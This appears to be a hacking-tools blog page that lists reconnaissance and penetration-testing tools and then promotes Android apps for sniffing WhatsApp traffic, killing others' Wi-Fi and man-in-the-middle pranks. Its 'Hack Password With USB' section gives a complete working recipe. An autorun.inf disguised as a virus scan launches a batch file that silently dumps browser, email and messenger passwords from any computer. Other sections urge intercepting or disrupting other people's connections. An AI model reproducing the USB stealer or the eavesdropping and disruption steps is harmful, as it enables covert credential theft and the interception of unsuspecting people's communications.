Operative Framework: A Tool Use For Website Fingerprint And Information Gathering

Operative Framework: To Get Website Fingerprint And Information Gathering.

This is a framework based on fingerprint action, this tool is used for get information on a website or a enterprise target with multiple modules like Video search, Linkedin search, Reverse email whois, Reverse ip whois, SQL file forensics. The tool is created by French security researcher user graniet.

This is a framework based on fingerprint action, this tool is used for get information on website or enterprise target.

Dependency and Launching

• pip install -r requirements.txt
• python operative.py

Core Modules

• core/modules/cms_gathering
• core/modules/domain_search
• core/modules/email_to_domain
• core/modules/https_gathering
• core/modules/linkedin_search
• core/modules/reverse_ipdomain
• core/modules/search_db
• core/modules/waf_gathering
• core/modules/whois_domain
• core/modules/generate_email
• core/modules/viadeo_search
• core/modules/file_common
• core/modules/get_websiteurl
• core/modules/getform_data

SQL File forensics

• import database in core/dbs/
• read table
• read columns
• search information with pattern

How to Use?





Download Operative Framework


Disclaimer: This tool is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.

DMitry A Deepmagic Information Gathering Tool For Linux

DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU) Linux Command Line Application coded in C language.

DMitry has the ability to gather as much information as possible about a host. Base functionality is able to gather possible subdomains, email addresses, uptime information, tcp port scan, whois lookups, and more. The information are gathered with following methods:

• Perform an Internet Number whois lookup.
• Retrieve possible uptime data, system and server data.
• Perform a SubDomain search on a target host.
• Perform an E-Mail address search on a target host.
• Perform a TCP Portscan on the host target.
• A Modular program allowing user specified modules

Download and installation

DMitry can be downloaded by issuing following commands:

$ cd /data/src/
$ wget http://mor-pah.net/code/DMitry-1.3a.tar.gz

For installation, issue following commands:

$ tar xzvf DMitry-1.3a.tar.gz
$ cd DMitry-1.3a/
$ ./configure
$ make
$ sudo make install

Then optionally create a symbolic link to your /pentest/ directory:

$ mkdir -p /pentest/enumeration/dmitry/
$ ln -s /usr/local/bin/dmitry /pentest/enumeration/dmitry/dmitry

Use

help
DMitry help can be displayed by issuing:

$ dmitry --help

Download

Ethical Hacking tools

NMAP

Nmap stands for Network Mapper. It is an open source tool that is used widely for network discovery and security auditing. Nmap was originally designed to scan large networks, but it can work equally well for single hosts. Network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

Nmap uses raw IP packets to determine −

• what hosts are available on the network,
• what services those hosts are offering,
• what operating systems they are running on,
• what type of firewalls are in use, and other such characteristics.

Nmap runs on all major computer operating systems such as Windows, Mac OS X, and Linux.

Metasploit

Metasploit is one of the most powerful exploit tools. It’s a product of Rapid7 and most of its resources can be found at: www.metasploit.com. It comes in two versions − commercial and free edition. Matasploit can be used with command prompt or with Web UI.

With Metasploit, you can perform the following operations −

• Conduct basic penetration tests on small networks
• Run spot checks on the exploitability of vulnerabilities
• Discover the network or import scan data
• Browse exploit modules and run individual exploits on hosts

Burp Suit

Burp Suite is a popular platform that is widely used for performing security testing of web applications. It has various tools that work in collaboration to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp is easy to use and provides the administrators full control to combine advanced manual techniques with automation for efficient testing. Burp can be easily configured and it contains features to assist even the most experienced testers with their work.

Angry IP Scanner

Angry IP scanner is a lightweight, cross-platform IP address and port scanner. It can scan IP addresses in any range. It can be freely copied and used anywhere. In order to increase the scanning speed, it uses multithreaded approach, wherein a separate scanning thread is created for each scanned IP address.

Angry IP Scanner simply pings each IP address to check if it’s alive, and then, it resolves its hostname, determines the MAC address, scans ports, etc. The amount of gathered data about each host can be saved to TXT, XML, CSV, or IP-Port list files. With help of plugins, Angry IP Scanner can gather any information about scanned IPs.

Cain & Abel

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It helps in easy recovery of various kinds of passwords by employing any of the following methods −

• sniffing the network,
• cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks,
• recording VoIP conversations,
• decoding scrambled passwords,
• recovering wireless network keys,
• revealing password boxes,
• uncovering cached passwords and analyzing routing protocols.

Cain & Abel is a useful tool for security consultants, professional penetration testers and everyone else who plans to use it for ethical reasons.

Ettercap

Ettercap stands for Ethernet Capture. It is a network security tool for Man-in-the-Middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. Ettercap has inbuilt features for network and host analysis. It supports active and passive dissection of many protocols.

You can run Ettercap on all the popular operating systems such as Windows, Linux, and Mac OS X.

EtherPeek

EtherPeek is a wonderful tool that simplifies network analysis in a multiprotocol heterogeneous network environment. EtherPeek is a small tool (less than 2 MB) that can be easily installed in a matter of few minutes.

EtherPeek proactively sniffs traffic packets on a network. By default, EtherPeek supports protocols such as AppleTalk, IP, IP Address Resolution Protocol (ARP), NetWare, TCP, UDP, NetBEUI, and NBT packets.

SuperScan

SuperScan is a powerful tool for network administrators to scan TCP ports and resolve hostnames. It has a user friendly interface that you can use to −

• Perform ping scans and port scans using any IP range.
• Scan any port range from a built-in list or any given range.
• View responses from connected hosts.
• Modify the port list and port descriptions using the built in editor.
• Merge port lists to build new ones.
• Connect to any discovered open port.
• Assign a custom helper application to any port.

QualysGuard

QualysGuard is an integrated suite of tools that can be utilized to simplify security operations and lower the cost of compliance. It delivers critical security intelligence on demand and automates the full spectrum of auditing, compliance and protection for IT systems and web applications.

QualysGuard includes a set of tools that can monitor, detect, and protect your global network.

WebInspect

WebInspect is a web application security assessment tool that helps identify known and unknown vulnerabilities within the Web application layer.

It can also help check that a Web server is configured properly, and attempts common web attacks such as parameter injection, cross-site scripting, directory traversal, and more.

LC4

LC4 was formerly known as L0phtCrack. It is a password auditing and recovery application. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, and hybrid attacks.

LC4 recovers Windows user account passwords to streamline migration of users to another authentication system or to access accounts whose passwords are lost.

LANguard Network Security Scanner

LANguard Network Scanner monitors a network by scanning connected machines and providing information about each node. You can obtain information about each individual operating system.

It can also detect registry issues and have a report set up in HTML format. For each computer, you can list the netbios name table, current logged-on user, and Mac address.

Network Stumbler

Network stumbler is a WiFi scanner and monitoring tool for Windows. It allows network professionals to detect WLANs. It is widely used by networking enthusiasts and hackers because it helps you find non-broadcasting wireless networks.

Network Stumbler can be used to verify if a network is well configured, its signal strength or coverage, and detect interference between one or more wireless networks. It can also be used to non-authorized connections.

ToneLoc

ToneLoc stands for Tone Locator. It was a popular war dialling computer program written for MS-DOS in the early 90’s. War dialling is a technique of using a modem to automatically scan a list of telephone numbers, usually dialling every number in a local area code.

Malicious hackers use the resulting lists in breaching computer security - for guessing user accounts, or locating modems that might provide an entry-point into computer or other electronic systems.

It can be used by security personnel to detect unauthorized devices on a company’s telephone network.

Hack Password With USB

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox.

There exists many tools for recovering these passswords from their stored places. Using these tools and a USB pen-drive, you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit:

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more.

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed:

Record Index, Web Site, User Name, Password, User Name Field and Password Field.

Preparing Your USB Drive for Password Hacking:

Here is a step by step procedure to create the password hacking toolkit:

    

1. Download all the 5 tools, extract them and copy only the executable files (.exe files) onto your USB Pendrive.
   ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it:

   [autorun] open=launch.bat ACTION= Perform a Virus Scan

   save the Notepad and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pen-drive.
3. Create another Notepad and write the following text onto it:

   start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe

   /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt 

   
   Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file to your USB drive.
   Now your rootkit is ready and you are all set to sniff the passwords. You can use this pen-drive on on any computer to sniff the stored passwords. Just follow these steps:

1. Insert the pen-drive and the auto-run window will pop-up. (This is because, we have created an auto-run pen-drive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pen-drive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP, Vista and 7

Hide ip With 4nonimizer for Kali Linux

It is a bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN), whether free or paid. By default, it includes several pre-configured VPN connections to different peers (.ovpn files) and download the credentials. Also, it records each used IP that we use every 300 seconds in log files.

This script is enabled as a service in systemd systems and uses a default vpn (VPNBook) at system startup.

Since version 1.05 the dns resolution requests are done throught DnsCrypt (disabled in 1.06 version for improving!)

Once installed 4nonymizer, enter the command 4nonimizer help to get the help, which shows all the available parameters:

       ___                   _           _
      /   |                 (_)         (_)
     / /| |_ __   ___  _ __  _ _ __ ___  _ _______ _ __
    / /_| | '_ \ / _ \| '_ \| | '_  ` _ | |_  / _ \ '__|
    \___  | | | | (_) | | | | | | | | | | |/ /  __/ |
        |_/_| |_|\___/|_| |_|_|_| |_| |_|_/___\___|_|
                                       By Carlos Antonini & Vicente Motos
                                       Version: 1.06-beta

Usage: 4nonymizer <parameter>
     install: Install the script in run services
     uninstall: Disable run service and remove app directory
     change_provider: Change VPN Provider
     change_ip: Change IP from VPN current
     vpn_status: Check IP and provider VPN running
     update_vpns: Update all ovpn of VPNs
     start: Init the 4nonimizer service
     stop: Stop the 4nonimizer service
     stop_nonet: Stop the 4nonimizer service and shutdown network interfaces
     restart: Restart the 4nonimizer service
     update_app: Update this program via git
     privoxy: Install and configure privoxy with port 8118 (BETA)
     proxychains4: Install and configure proxychains4 for default in the system
     browser: Fire up a firefox browser with profile privoxy -> tor
     test_availability: Check peers availability and delete ovpn file if the IP/service is unreachable
     location: Now you can select a specific country or continent of the vpn peer
     enableboot: You can enable service in boot
     disableboot: You can disable service in boot
     help: Help (this screen)

 Installation:

                     1) Move the folder to Desktop

                     2) open terminal

                     3) root@kali $ cd Desktop

                     4) root@kali $ chmod +x 4nonimizer

                     5) root@kali $  ./4nonimizer install        

 

                                     Click to download

 

Game Hacker Tool For Android

 

 Game Hackers is an android game modifying tool which you will find easier than any other game modifying apps or tools. This tool helps you to get unlimited Lives,Gold,Money,etc. Moreover, it doesn’t annoy you with boring ads neither asks you money to get full version.

Note:- Game Hacker works only on rooted devices. If your device is not rooted, please root it first with kingroot. We recommend kingroot apk because it doesn’t require PC to root and also kingroot support maximum number of devices

Features:-

    Accurate Search: You can search the value, what you can see in the game. Suppose, if you see 123456 coins in certain game, you can search 123456 in the SB game hacker app and if it shows only one data, you can edit this data and enter value such as 999999, or any value you want and you will see that total coins will be changed to 999999 in that game.
    Fuzzy search: A fuzzy search is a process that locates values that are likely to be relevant to a search argument even when the argument does not exactly correspond to the desired information. So, if you are not sure which value to search try fuzzy search.
 Floating-point (decimal): If game data is not integer, ( value between 0 – 4294967295) you cannot do fuzzy search. At that condition you should try this.
 Data filtering: to determine the size of the data range, and improve efficiency.

Supported Languages:- English,Chinese,Traditional Chinese.


                                       Click to download

Whatsapp Sniffer Tool For Android

 

 

Whatsapp Sniffer is an app able to display messages from other WhatsApp users connected to the same network as the app user. The tool diverts all data traffic on, for example, a Wi-Fi network through the user's smartphone and seeks out WhatsApp messages, which are transferred in plain text. All the user requires is a rooted Android smartphone.

The WhatsApp messaging service has established itself as an alternative to texting between smartphone users, because, unlike text messages, users only have to pay for data use. And if a user is in range of a free Wi-Fi point, then it is free to use.

But on public Wi-Fi networks, using WhatsApp turns out to be a very bad idea. Unlike, for example, iMessage, WhatsApp messages are transmitted in plain text, meaning that curious eavesdroppers, along with the intended recipient, can read them.

What previously would have required the use of a range of tools and some basic networking knowledge can now be performed at a stroke using WhatsApp Sniffer. The only way for users who have installed WhatsApp to avoid this is to refrain from using it on any Wi-Fi network that potentially untrusted users could be connected to.

The app uses ARP spoofing to divert all local network traffic through the smartphone. If it finds WhatsApp messages in this traffic, it displays them in a user-friendly conversation-style view. It displays both incoming and outgoing messages and can also display photos and video. A short test by The H's associates at heise Security found that the tool performed just as promised.

WhatsApp Sniffer was originally available to download from Google Play, but was removed a few days ago. This may slow down its dissemination, but it is not going to stop it altogether – a search on Google quickly unearths the APK installation file. TheDroidSheep app, which allows users to intercept Facebook sessions and other web services, was also recently removed from Google Play, but is still proving popular

           

                              

                                  Click to download

Wifi Kill Pro Tool For Android

        

WifiKill is an android application that helps you to disable other people’s Wi-Fi internet connections on the same network. It is a kind of hacking process in which you are hacking other person’s internet connection and trying to disable it. This app is specifically developed for the Android smartphone users. You can easily become a hacker as WifiKill literally falls in the category of hacking and this application is capable of searching for the user information in the Wi-Fi modem

Features of WifiKill

• Show the traffic consumed by the device.
• Grabs blog traffic and show the sites visited by the grabbed devices.
• Show the network names of the devices.
• Reveals the total number of bytes transferred by the ‘snatched device’.
• Capable of disabling the Internet access of any grabbed device.
• You can also view what other’s are surfing on internet and even see what they download from internet.
• It supports Tablets and hence it is both mobile and tablet-friendly!
• WifiKill supports Android 4.0 and above only.

Requirements of WifiKill

• It requires Root accessibility.
• Works for Android 4.0 and above only.

                               Click to download

Dsploit Tool For Android

      

dSploit contains a number of powerful functions that allow you to analyze, capture, and manipulate network transactions. You can scan networks for connected devices, identify the operating system, running services and open ports on each device, as well as checking them for vulnerabilities.

You can also use dSploit to perform so-called “man in the middle’ operations. This is where the ‘fun’ comes. You can use it to intercept traffic from a network-attached computer, and mess with it in a number of ways. For example you can cause havoc with friends or family by replacing all images that appear on every web page on a computer with an image you specify. You can also completely block all internet traffic on the computer. There are a number of other tools such as password sniffers and login crackers, which of course should never be used for anything malicious.
The app is currently in beta, so there may be bugs present. However, a large number of users are reporting good feedback in the thread. You need to be running at least Android 2.3 Gingerbread, and the device must be rooted.


                                       Click to download